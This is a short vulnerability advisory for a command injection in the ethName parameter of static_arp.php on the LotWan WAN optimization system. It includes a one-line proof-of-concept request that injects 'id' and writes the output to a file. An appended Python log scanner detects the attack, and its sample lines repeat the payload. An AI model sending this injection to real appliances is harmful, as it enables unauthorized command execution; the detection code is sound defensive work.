Huaxia Innovation LotWan WAN Optimization System static_arp.php Remote Command Execution Vulnerability
Vulnerability Description
In the Huaxia Innovation LotWan WAN Optimization System, the ethName parameter of static_arp.php is spliced into a system command, resulting in a remote command execution vulnerability.
Vulnerability Impact
Huaxia Innovation LotWan WAN Optimization System
Network surveying and mapping
Vulnerability Reproduction
Login page
The vulnerable file is
/acc/bindipmac/static_arp.php?ethName=||id>cmd.txt||
Then visit /acc/bindipmac/cmd.txt
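A detection check for this request pattern, added here as an example and not part of the original post: it scans web access log lines for requests to static_arp.php whose ethName value is not a plain interface name. The combined log format, the interface-name allowlist and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/acc/bindipmac/static_arp.php"  # endpoint named in the advisory
# Assumption: a legitimate ethName is a plain interface name (eth0, br0.1, ...)
SAFE_ETHNAME = re.compile(r"[A-Za-z0-9_.:-]{1,15}")
# Request line of a combined-format access log entry (assumed log format)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real device
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /acc/bindipmac/static_arp.php?ethName=eth0 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /acc/bindipmac/static_arp.php?ethName=||id>cmd.txt|| HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:05:02 +0000] "GET /acc/bindipmac/static_arp.php?ethName=%7C%7Cid%3Ecmd.txt%7C%7C HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:05:05 +0000] "GET /acc/bindipmac/cmd.txt HTTP/1.1" 200 40',
]

def suspicious_ethname(log_line):
    """Return the decoded ethName if the line is a request to the vulnerable
    endpoint with a value outside the allowlist, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # Normalise the path so doubled slashes or ./ segments still match
    if posixpath.normpath(unquote(url.path)) != VULN_PATH:
        return None
    # parse_qs percent-decodes values, so encoded metacharacters are caught too
    for value in parse_qs(url.query, keep_blank_values=True).get("ethName", []):
        if not SAFE_ETHNAME.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_ethname(line)
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious ethName {value!r}")
```

The check only sees values that reach the access log, so a parameter sent in a POST body needs the same allowlist applied at a reverse proxy or WAF instead.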
This post is licensed under CC BY 4.0 by the author.